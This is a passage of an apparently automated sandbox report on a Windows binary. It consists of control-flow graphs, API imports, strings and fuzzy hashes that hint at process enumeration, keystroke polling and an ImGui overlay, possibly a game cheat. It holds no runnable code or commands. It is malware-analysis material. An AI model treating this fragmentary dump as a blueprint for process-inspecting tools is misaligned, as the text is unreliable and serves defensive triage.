17431 7ff69dcfa722 memmove 17429->17431 17430->17409 17432 7ff69dcfa74c free 17431->17432 17433 7ff69dcfa73a 17431->17433 17432->17430 17433->17432 17435 7ff69dd1d44a RtlLookupFunctionEntry 17434->17435 17436 7ff69dd1d387 17435->17436 17437 7ff69dd1d460 RtlVirtualUnwind 17435->17437 17438 7ff69dd1d328 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17436->17438 17437->17435 17437->17436

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 7ff69dcd1230-7ff69dcd1809 CreateThread GetSystemMetrics * 2 CreateFileA 5 7ff69dcd1810-7ff69dcd1845 0->5 5->5 6 7ff69dcd1847-7ff69dcd196d call 7ff69dcd2d80 CreateToolhelp32Snapshot 5->6 11 7ff69dcd1973-7ff69dcd1b5e 6->11 12 7ff69dcd2b08-7ff69dcd2b2f 6->12 18 7ff69dcd1b60-7ff69dcd1b91 11->18 13 7ff69dcd2b35-7ff69dcd2b49 12->13 14 7ff69dcd2c3d-7ff69dcd2c45 12->14 16 7ff69dcd2b51-7ff69dcd2c35 13->16 17 7ff69dcd2c50-7ff69dcd2c74 14->17 16->16 19 7ff69dcd2c3b 16->19 17->17 20 7ff69dcd2c76 17->20 18->18 21 7ff69dcd1b93-7ff69dcd1fa5 call 7ff69dcd30a0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z call 7ff69dcd3280 call 7ff69dd1c9b0 18->21 19->20 22 7ff69dcd2c7a-7ff69dcd2c89 call 7ff69dcd30a0 call 7ff69dcd3280 20->22 38 7ff69dcd1fb0-7ff69dcd1fe1 21->38 30 7ff69dcd2c8e-7ff69dcd2cd8 call 7ff69dd1cf30 22->30 38->38 39 7ff69dcd1fe3-7ff69dcd2025 call 7ff69dcd30a0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff69dcd3280 GetModuleHandleA 38->39 44 7ff69dcd202b-7ff69dcd209b GetCurrentProcessId call 7ff69dd1c9b0 39->44 45 7ff69dcd2997-7ff69dcd29ba 39->45 44->45 53 7ff69dcd20a1-7ff69dcd2109 call 7ff69dd1c9b0 44->53 47 7ff69dcd29c0-7ff69dcd29cd 45->47 48 7ff69dcd2ac1-7ff69dcd2acb 45->48 51 7ff69dcd29d0-7ff69dcd2ab6 47->51 49 7ff69dcd2ad0-7ff69dcd2afd 48->49 49->49 52 7ff69dcd2aff-7ff69dcd2b03 49->52 51->51 54 7ff69dcd2abc-7ff69dcd2abf 51->54 52->22 57 7ff69dcd2110-7ff69dcd21b9 53->57 54->48 54->52 59 7ff69dcd21bf-7ff69dcd2249 FreeLibrary call 7ff69dcd30a0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff69dcd3280 57->59 65 7ff69dcd2250-7ff69dcd2286 call 7ff69dcd2fe0 59->65 69 7ff69dcd2288-7ff69dcd2635 65->69 72 7ff69dcd2640-7ff69dcd2667 69->72 72->72 73 7ff69dcd2669-7ff69dcd26c3 call 7ff69dcd30a0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_J@Z call 7ff69dcd3280 call 7ff69dd1cf50 _beginthreadex 72->73 80 7ff69dcd2988-7ff69dcd2996 ?_Throw_Cpp_error@std@@YAXH@Z 73->80 81 7ff69dcd26c9-7ff69dcd26cd 73->81 80->45 82 7ff69dcd26d3-7ff69dcd26e8 _Thrd_detach 81->82 83 7ff69dcd297c-7ff69dcd2987 ?_Throw_Cpp_error@std@@YAXH@Z 81->83 82->83 84 7ff69dcd26ee-7ff69dcd272c call 7ff69dd1cf50 _beginthreadex 82->84 83->80 87 7ff69dcd2732-7ff69dcd2736 84->87 88 7ff69dcd296d-7ff69dcd297b ?_Throw_Cpp_error@std@@YAXH@Z 84->88 89 7ff69dcd2961-7ff69dcd296c ?_Throw_Cpp_error@std@@YAXH@Z 87->89 90 7ff69dcd273c-7ff69dcd2751 _Thrd_detach 87->90 88->83 89->88 90->89 91 7ff69dcd2757-7ff69dcd2795 call 7ff69dd1cf50 _beginthreadex 90->91 94 7ff69dcd2952-7ff69dcd2960 ?_Throw_Cpp_error@std@@YAXH@Z 91->94 95 7ff69dcd279b-7ff69dcd279f 91->95 94->89 96 7ff69dcd27a5-7ff69dcd27ba _Thrd_detach 95->96 97 7ff69dcd2946-7ff69dcd2951 ?_Throw_Cpp_error@std@@YAXH@Z 95->97 96->97 98 7ff69dcd27c0-7ff69dcd292f call 7ff69dcd9820 call 7ff69dcdea40 96->98 97->94 98->97
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: MetricsSystem$CreateThread
                  • String ID: ,ydE$\\.\{a88a276e-7abe-4381-9b7b-3e470c634868}$a}^U$ntdll.dll
                  • API String ID: 889271177-960994179
                  • Opcode ID: 8f169d80d77ebc2417053dbb3445d214e2709d73caf2d3ad4744d53e74055482
                  • Instruction ID: 26f783ee701134eab3da5dcc68ee9b6c5bc945cf05d60eabedcfa3da90d081cd
                  • Opcode Fuzzy Hash: 8f169d80d77ebc2417053dbb3445d214e2709d73caf2d3ad4744d53e74055482
                  • Instruction Fuzzy Hash: AF52DA22D197818AE7219F35D8411B9B3B4FF95348F409376EA8DA6A65FF3CE186C340

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 103 7ff69dcd30a0-7ff69dcd30c9 104 7ff69dcd30d0-7ff69dcd30d7 103->104 104->104 105 7ff69dcd30d9-7ff69dcd30e8 104->105 106 7ff69dcd30f4 105->106 107 7ff69dcd30ea-7ff69dcd30ed 105->107 109 7ff69dcd30f6-7ff69dcd3106 106->109 107->106 108 7ff69dcd30ef-7ff69dcd30f2 107->108 108->109 110 7ff69dcd310f-7ff69dcd3121 ?good@ios_base@std@@QEBA_NXZ 109->110 111 7ff69dcd3108-7ff69dcd310e 109->111 112 7ff69dcd3153-7ff69dcd3159 110->112 113 7ff69dcd3123-7ff69dcd3132 110->113 111->110 117 7ff69dcd3165-7ff69dcd3178 112->117 118 7ff69dcd315b-7ff69dcd3160 112->118 115 7ff69dcd3134-7ff69dcd3137 113->115 116 7ff69dcd3151 113->116 115->116 119 7ff69dcd3139-7ff69dcd314f ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 115->119 116->112 121 7ff69dcd317a 117->121 122 7ff69dcd31ad-7ff69dcd31c8 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 117->122 120 7ff69dcd321d-7ff69dcd323b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 118->120 119->112 123 7ff69dcd323d-7ff69dcd3246 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 120->123 124 7ff69dcd3247-7ff69dcd3257 120->124 125 7ff69dcd3180-7ff69dcd3183 121->125 126 7ff69dcd31ca 122->126 127 7ff69dcd31f6 122->127 123->124 130 7ff69dcd3260-7ff69dcd3274 124->130 131 7ff69dcd3259-7ff69dcd325f 124->131 125->122 132 7ff69dcd3185-7ff69dcd319f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 125->132 128 7ff69dcd31d0-7ff69dcd31d3 126->128 129 7ff69dcd31f9 127->129 133 7ff69dcd31d5-7ff69dcd31ef ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 128->133 134 7ff69dcd31fd-7ff69dcd320d 128->134 129->134 131->130 135 7ff69dcd31a1-7ff69dcd31a6 132->135 136 7ff69dcd31a8-7ff69dcd31ab 132->136 133->127 137 7ff69dcd31f1-7ff69dcd31f4 133->137 134->120 135->129 136->125 137->128
                  APIs
                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF69DCD3119
                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF69DCD3139
                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF69DCD3149
                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF69DCD3196
                  • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF69DCD31BF
                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF69DCD31E6
                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF69DCD322C
                  • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF69DCD3233
                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF69DCD3240
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                  • String ID:
                  • API String ID: 4121003011-0
                  • Opcode ID: 712f323c0604f6e08ee02be1f8088f9027d322c31263b320504701cedf2872dd
                  • Instruction ID: 8acc032d521e5134f9761b35d9d5cde9ea5add6fbe338e38c5966c7fc649f9eb
                  • Opcode Fuzzy Hash: 712f323c0604f6e08ee02be1f8088f9027d322c31263b320504701cedf2872dd
                  • Instruction Fuzzy Hash: CF514122A49A42C1EB318B59D990238A7B4FF85F95F15C672CF9E837A0DF39D4478340

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 139 7ff69dcd3280-7ff69dcd32bc 140 7ff69dcd32c5-7ff69dcd32d7 ?good@ios_base@std@@QEBA_NXZ 139->140 141 7ff69dcd32be-7ff69dcd32c4 139->141 142 7ff69dcd3309-7ff69dcd330f 140->142 143 7ff69dcd32d9-7ff69dcd32e8 140->143 141->140 147 7ff69dcd33e2-7ff69dcd3410 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 142->147 148 7ff69dcd3315-7ff69dcd333b 142->148 145 7ff69dcd32ea-7ff69dcd32ed 143->145 146 7ff69dcd3307 143->146 145->146 149 7ff69dcd32ef-7ff69dcd3305 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 145->149 146->142 150 7ff69dcd3412-7ff69dcd341b ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 147->150 151 7ff69dcd341c-7ff69dcd342b 147->151 152 7ff69dcd333d 148->152 153 7ff69dcd3379-7ff69dcd3392 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 148->153 149->142 150->151 155 7ff69dcd3434-7ff69dcd344a 151->155 156 7ff69dcd342d-7ff69dcd3433 151->156 157 7ff69dcd3340-7ff69dcd3345 152->157 154 7ff69dcd3395-7ff69dcd3399 153->154 158 7ff69dcd33a0-7ff69dcd33a5 154->158 156->155 157->158 159 7ff69dcd3347-7ff69dcd334a 157->159 160 7ff69dcd33d2 158->160 161 7ff69dcd33a7-7ff69dcd33aa 158->161 163 7ff69dcd334c-7ff69dcd3374 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 159->163 164 7ff69dcd3376 159->164 160->147 161->160 165 7ff69dcd33ac-7ff69dcd33d0 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 161->165 163->157 164->153 165->154
                  APIs
                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF69DCD32CF
                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF69DCD32EF
                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF69DCD32FF
                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF69DCD335D
                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF69DCD3384
                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF69DCD33BD
                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF69DCD3401
                  • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF69DCD3408
                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF69DCD3415
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                  • String ID:
                  • API String ID: 3107587312-0
                  • Opcode ID: ceb5174cdfb678df6d66a02f399e29ac295f59472da4735e7f8ec5c58072d53b
                  • Instruction ID: 7e50aeb8b43c9cfa3f3c515ecfd682953d2410bd594a3dcc226d7affa8aec801
                  • Opcode Fuzzy Hash: ceb5174cdfb678df6d66a02f399e29ac295f59472da4735e7f8ec5c58072d53b
                  • Instruction Fuzzy Hash: E2514E32609A81C6EB208F59E6D0238ABB0FF85F95F158672CE9E87760DF39D4578340
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: free$mallocmemset
                  • String ID:
                  • API String ID: 2682772760-0
                  • Opcode ID: 5c3df57c7a27f6585d9e04badd17906bfcd3c1d59ab75e6b294e808623ca5f87
                  • Instruction ID: 921b7b872a71e121cb72de929471eb8eb7c41f22fcee17f2c9e8eaa385610631
                  • Opcode Fuzzy Hash: 5c3df57c7a27f6585d9e04badd17906bfcd3c1d59ab75e6b294e808623ca5f87
                  • Instruction Fuzzy Hash: E9C2AE32B04A858AE7248F26D44077D77A4FB88B88F049775DE8E97B94EF38E855C740
                  APIs
                  • memmove.VCRUNTIME140 ref: 00007FF69DCE6E5B
                    • Part of subcall function 00007FF69DCFAEE0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF69DCF9A12), ref: 00007FF69DCFAF13
                    • Part of subcall function 00007FF69DCFAEE0: memmove.VCRUNTIME140(?,?,?,?,00000000,00000000,00000000,00007FF69DCF9A12), ref: 00007FF69DCFAF2F
                    • Part of subcall function 00007FF69DCFAEE0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF69DCF9A12), ref: 00007FF69DCFAF4F
                    • Part of subcall function 00007FF69DCFAD20: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAD50
                    • Part of subcall function 00007FF69DCFAD20: memmove.VCRUNTIME140 ref: 00007FF69DCFAD6C
                    • Part of subcall function 00007FF69DCFAD20: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAD8C
                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE6F1D
                  • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE6FAB
                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE6FB4
                  • acosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCE7334
                  • ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCE7343
                  • cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCE7382
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: freememmove$malloc$acosfceilfcosffclosefwrite
                  • String ID: (Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming)$333?$Click %s Button to break in debugger! (remap w/ Ctrl+Shift)$Debug##Default$HoveredId: 0x%08X$Left$Middle$NewFrame(): ClearActiveID() because it isn't marked alive anymore!$Press ESC to abort picking.$Remap w/ Ctrl+Shift: click anywhere to select new mouse button.$Right$gfff
                  • API String ID: 2179310466-1374454768
                  • Opcode ID: 0ee57dce658e20ccf20fbebd1ee4759b6f954246ba2a2fd3b70c4b800430646f
                  • Instruction ID: 4ba97386d6498a3a22624e8d9b5a6160f9e68da1c773e8aa58e55a81671305c6
                  • Opcode Fuzzy Hash: 0ee57dce658e20ccf20fbebd1ee4759b6f954246ba2a2fd3b70c4b800430646f
                  • Instruction Fuzzy Hash: D1B20472A046C2C6E729CF35C5452B877B8FF44B84F088276DB99972D1EF38B9628710

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 783 7ff69dcd5fe0-7ff69dcd60ba call 7ff69dcd3650 786 7ff69dcd60c0-7ff69dcd60dc call 7ff69dcd3650 783->786 789 7ff69dcd60de-7ff69dcd60ed call 7ff69dcd5bd0 786->789 792 7ff69dcd60f3-7ff69dcd6115 789->792 793 7ff69dcd6556-7ff69dcd655d 789->793 796 7ff69dcd68df 792->796 797 7ff69dcd611b 792->797 794 7ff69dcd6563-7ff69dcd656a 793->794 795 7ff69dcd68e9-7ff69dcd6928 call 7ff69dcd3650 793->795 794->795 798 7ff69dcd6570-7ff69dcd657f GetAsyncKeyState 794->798 807 7ff69dcd6955-7ff69dcd696e call 7ff69dcd4e00 795->807 808 7ff69dcd692a-7ff69dcd6939 795->808 796->795 799 7ff69dcd6120-7ff69dcd6139 call 7ff69dcd3aa0 797->799 798->795 801 7ff69dcd6585-7ff69dcd659a 798->801 811 7ff69dcd6175-7ff69dcd618a call 7ff69dcd6b80 799->811 812 7ff69dcd613b-7ff69dcd616b call 7ff69dcd6980 * 2 799->812 804 7ff69dcd65ab-7ff69dcd6619 call 7ff69dd1e000 powf 801->804 805 7ff69dcd659c 801->805 822 7ff69dcd6624-7ff69dcd6627 sqrtf 804->822 823 7ff69dcd661b-7ff69dcd6622 804->823 805->804 809 7ff69dcd659e-7ff69dcd65a3 805->809 807->786 808->807 813 7ff69dcd693b-7ff69dcd6950 call 7ff69dcd4e00 808->813 809->804 815 7ff69dcd65a5 809->815 826 7ff69dcd6190-7ff69dcd61ad call 7ff69dcd2fe0 811->826 827 7ff69dcd628b-7ff69dcd6292 811->827 812->811 837 7ff69dcd616d-7ff69dcd616f 812->837 813->786 815->795 815->804 828 7ff69dcd662c-7ff69dcd6630 822->828 823->828 826->827 841 7ff69dcd61b3-7ff69dcd61ba 826->841 827->799 830 7ff69dcd6298-7ff69dcd629f 827->830 832 7ff69dcd6632 828->832 833 7ff69dcd6638-7ff69dcd66af call 7ff69dcd39d0 powf * 3 828->833 830->796 835 7ff69dcd62a5-7ff69dcd62ad 830->835 832->795 832->833 843 7ff69dcd66b1-7ff69dcd66b8 833->843 844 7ff69dcd66ba-7ff69dcd66bd sqrtf 833->844 839 7ff69dcd62b3-7ff69dcd62b6 835->839 840 7ff69dcd64d6-7ff69dcd64fb call 7ff69dcd3aa0 call 7ff69dcd5a80 835->840 837->811 837->827 845 7ff69dcd64ab-7ff69dcd64d4 call 7ff69dcd3aa0 call 7ff69dcd5a80 839->845 846 7ff69dcd62bc-7ff69dcd62bf 839->846 875 7ff69dcd64ff-7ff69dcd6544 call 7ff69dcd5760 840->875 841->827 847 7ff69dcd61c0-7ff69dcd623e call 7ff69dcd5a80 call 7ff69dcd5760 841->847 849 7ff69dcd66c2-7ff69dcd66f0 call 7ff69dcd6980 * 2 843->849 844->849 845->875 851 7ff69dcd62c5-7ff69dcd62c8 846->851 852 7ff69dcd6480-7ff69dcd64a9 call 7ff69dcd3aa0 call 7ff69dcd5a80 846->852 881 7ff69dcd6240-7ff69dcd6247 847->881 882 7ff69dcd6249-7ff69dcd624c sqrtf 847->882 884 7ff69dcd6811-7ff69dcd6819 849->884 885 7ff69dcd66f6-7ff69dcd66fa 849->885 857 7ff69dcd6455-7ff69dcd647e call 7ff69dcd3aa0 call 7ff69dcd5a80 851->857 858 7ff69dcd62ce-7ff69dcd62d1 851->858 852->875 857->875 864 7ff69dcd654c 858->864 865 7ff69dcd62d7-7ff69dcd62da 858->865 864->793 872 7ff69dcd62e0-7ff69dcd6392 call 7ff69dcd3aa0 call 7ff69dcd5a80 call 7ff69dcd5760 powf * 2 865->872 912 7ff69dcd6394-7ff69dcd639b 872->912 913 7ff69dcd639d-7ff69dcd63a0 sqrtf 872->913 875->864 888 7ff69dcd6251-7ff69dcd6266 881->888 882->888 890 7ff69dcd6821-7ff69dcd682e 884->890 891 7ff69dcd6702-7ff69dcd6706 885->891 892 7ff69dcd66fc 885->892 888->827 894 7ff69dcd6268-7ff69dcd6273 888->894 895 7ff69dcd6862-7ff69dcd6877 _time64 srand 890->895 896 7ff69dcd6830 890->896 897 7ff69dcd670e-7ff69dcd6711 891->897 898 7ff69dcd6708 891->898 892->884 892->891 894->827 900 7ff69dcd6275-7ff69dcd6284 894->900 902 7ff69dcd687b rand 895->902 903 7ff69dcd6879 895->903 896->895 901 7ff69dcd6832-7ff69dcd683f 896->901 897->884 904 7ff69dcd6717-7ff69dcd671e 897->904 898->884 898->897 900->827 901->895 906 7ff69dcd6841 901->906 907 7ff69dcd6881-7ff69dcd6886 902->907 903->902 903->907 904->884 908 7ff69dcd6724-7ff69dcd680f call 7ff69dcd4620 call 7ff69dcdf380 call 7ff69dcd5760 904->908 906->895 910 7ff69dcd6843-7ff69dcd6850 906->910 914 7ff69dcd688a rand 907->914 915 7ff69dcd6888 907->915 908->890 910->895 918 7ff69dcd6852-7ff69dcd685c 910->918 916 7ff69dcd63a5-7ff69dcd63e9 powf * 2 912->916 913->916 917 7ff69dcd6890-7ff69dcd68a1 914->917 915->914 915->917 921 7ff69dcd63f4-7ff69dcd63f7 sqrtf 916->921 922 7ff69dcd63eb-7ff69dcd63f2 916->922 917->786 923 7ff69dcd68a7-7ff69dcd68da rand call 7ff69dcd49c0 917->923 918->786 918->895 925 7ff69dcd63fc-7ff69dcd6405 921->925 922->925 923->786 928 7ff69dcd6436-7ff69dcd6446 925->928 929 7ff69dcd6407-7ff69dcd642d 925->929 928->872 932 7ff69dcd644c-7ff69dcd6450 928->932 929->928 932->864
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: powf$sqrtf$cosfrandsinf$AsyncQuery_perf_counterQuery_perf_frequencyState_time64srand
                  • String ID: @KL$VUUU
                  • API String ID: 2870194952-515166107
                  • Opcode ID: aade23f632b227400c50702774617c5be644bb854c5b74dd9b59626d40f17ded
                  • Instruction ID: 83ea921d072c3dc8b5a9cb84adece00813c7e4313ded40f5745a3abf8293b104
                  • Opcode Fuzzy Hash: aade23f632b227400c50702774617c5be644bb854c5b74dd9b59626d40f17ded
                  • Instruction Fuzzy Hash: 8342D921D58B8A85E2729F3599411B9A374FF5A3C8F14A373E5CDA65A1FF2CB086C340

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 933 7ff69dcd7050-7ff69dcd70dd 934 7ff69dcd70e0 call 7ff69dce6490 933->934 935 7ff69dcd70e5-7ff69dcd70fe 934->935 936 7ff69dcd8263-7ff69dcd82ca call 7ff69dd1cf30 935->936 937 7ff69dcd7104-7ff69dcd7129 935->937 938 7ff69dcd7130-7ff69dcd713e 937->938 940 7ff69dcd7144-7ff69dcd7147 938->940 941 7ff69dcd8256-7ff69dcd825d 938->941 940->941 943 7ff69dcd714d-7ff69dcd73f1 call 7ff69dcdf380 call 7ff69dd1eb7c call 7ff69dd1eb82 call 7ff69dd1c9b0 call 7ff69dd1eb88 call 7ff69dcd5a80 call 7ff69dcd5760 call 7ff69dcd5a80 call 7ff69dcd5760 powf * 3 940->943 941->936 941->938 962 7ff69dcd73f3-7ff69dcd73fb 943->962 963 7ff69dcd73fd-7ff69dcd7401 sqrtf 943->963 964 7ff69dcd7406-7ff69dcd7429 962->964 963->964 965 7ff69dcd824e 964->965 966 7ff69dcd742f-7ff69dcd7444 call 7ff69dcd6b80 964->966 965->941 966->965 969 7ff69dcd744a-7ff69dcd7475 966->969 970 7ff69dcd7491-7ff69dcd7496 969->970 971 7ff69dcd7477-7ff69dcd747e 969->971 973 7ff69dcd8245 970->973 974 7ff69dcd749c-7ff69dcd74a4 970->974 971->970 972 7ff69dcd7480-7ff69dcd7485 971->972 972->970 975 7ff69dcd7487-7ff69dcd748f 972->975 973->965 974->973 976 7ff69dcd74aa-7ff69dcd74af 974->976 975->970 977 